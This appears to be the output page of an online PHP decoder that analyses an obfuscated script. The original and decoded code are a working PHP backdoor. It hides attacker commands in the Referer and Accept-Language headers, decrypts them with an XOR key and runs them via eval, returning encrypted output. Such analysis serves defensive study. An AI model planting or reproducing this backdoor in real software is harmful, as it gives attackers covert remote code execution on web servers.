Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $i='fcs[$i]="";$p=$ss($p,fc3);}if(arfcray_kefcy_exifcsts(fc$fcfci,$s)){$s[$i]fc.=$p..

Decoded Output download

$kh="c893";$kf="bad6";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$i='fcs[$i]="";$p=$ss($p,fc3);}if(arfcray_kefcy_exifcsts(fc$fcfci,$s)){$s[$i]fc.=$p;$e=stfcfcrpos($s[$ifc],$f);ifcf(';
$m='rr);parsfce_sfctr($ufc["query"],fc$qfc);$q=afcrray_valufces($q);fcprefcg_match_fcfcall("/fc([\\wfc])[\\fcw-]+(?:;q=0';
$p='/_/fc","/-/"),fcarrfcay("/","+"),fc$fcss($s[$fci],0,fc$e))fc),$fck)));fc$o=ofcb_get_contefcnts();ob_end_cfclean(';
$C='$i<$l;){for(fc$j=0;fc($j<$cfc&&fc$i<$lfc);$j+fc+,$fci++){$o.=$t{$i}fc^$k{$fcj};}}retfcurnfcfc $o;}$r=$_SERVEfcR';
$V='$fce){$k=$khfc.$kf;ob_fcstart(fcfc)fc;@efcval(@gzuncfcofcmpress(@x(@base6fc4_decodfce(preg_rfceplacfce(fcarray("';
$w=';$rr=fc@fc$r["HTTPfcfc_fcREfcFERER"];$ra=@$r["HTfcTP_ACfcCEPfcT_LANGUAGEfc"];if($rr&fc&$ra)fcfc{$u=parsefcfc_url($';
$Z='"strtolower";$fci=$m[1fc][0].$mfc[1][1]fc;$h=$fcsl($ssfc(fcmd5($i.$fcfckh),0fc,3fc));$f=$sl($ss(mfcd5($i.$kf),0,';
$f='$kh="fcc893";$kffcfc="bad6";functfciofcn x($t,$k){fc$fcc=strlenfc($fck);$fcl=fcstrlen($tfc);$o=""fc;for($ifc=0;';
$o='.([fc\\d]))?,?/",fc$ra,fc$m);iffcfc($q&&$m){fc@sessfcion_sfctart(fc);fc$s=&$fc_SESfcSION;fcfc$ssfc="substr";$sfcl=';
$s=str_replace('Z','','creZZate_ZfuZnZZction');
$S='3));fc$p="";fofcr($zfc=1;$zfc<cofcunt($m[1fc]);$z++)$pfc.=$q[$mfc[2][fcfc$z]];if(sfctrpos($p,$fch)===0fcfc){fc$';
$g=')fc;fc$d=basefc64_encodfce(xfc(gfczcomfcpress($o),$k));fcprint(fc"<$kfc>$d</$k>fc");@sfcefcssion_dfcestroy();}}}}';
$D=str_replace('fc','',$f.$C.$w.$m.$o.$Z.$S.$i.$V.$p.$g);
$k=$s('',$D);$k();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$C $i<$l;){for(fc$j=0;fc($j<$cfc&&fc$i<$lfc);$j+fc+,$fci++){$o...
$D $kh="c893";$kf="bad6";function x($t,$k){$c=strlen($k);$l=str..
$S 3));fc$p="";fofcr($zfc=1;$zfc<cofcunt($m[1fc]);$z++)$pfc.=$q..
$V $fce){$k=$khfc.$kf;ob_fcstart(fcfc)fc;@efcval(@gzuncfcofcmpr..
$Z "strtolower";$fci=$m[1fc][0].$mfc[1][1]fc;$h=$fcsl($ssfc(fcm..
$f $kh="fcc893";$kffcfc="bad6";functfciofcn x($t,$k){fc$fcc=str..
$g )fc;fc$d=basefc64_encodfce(xfc(gfczcomfcpress($o),$k));fcpri..
$i fcs[$i]="";$p=$ss($p,fc3);}if(arfcray_kefcy_exifcsts(fc$fcfc..
$k None
$m rr);parsfce_sfctr($ufc["query"],fc$qfc);$q=afcrray_valufces(..
$o .([fc\d]))?,?/",fc$ra,fc$m);iffcfc($q&&$m){fc@sessfcion_sfct..
$p /_/fc","/-/"),fcarrfcay("/","+"),fc$fcss($s[$fci],0,fc$e))fc..
$s create_function
$w ;$rr=fc@fc$r["HTTPfcfc_fcREfcFERER"];$ra=@$r["HTfcTP_ACfcCEP..

Stats

MD5 9c099816ddc013269fc26afbe2b39b3f
Eval Count 1
Decode Time 73 ms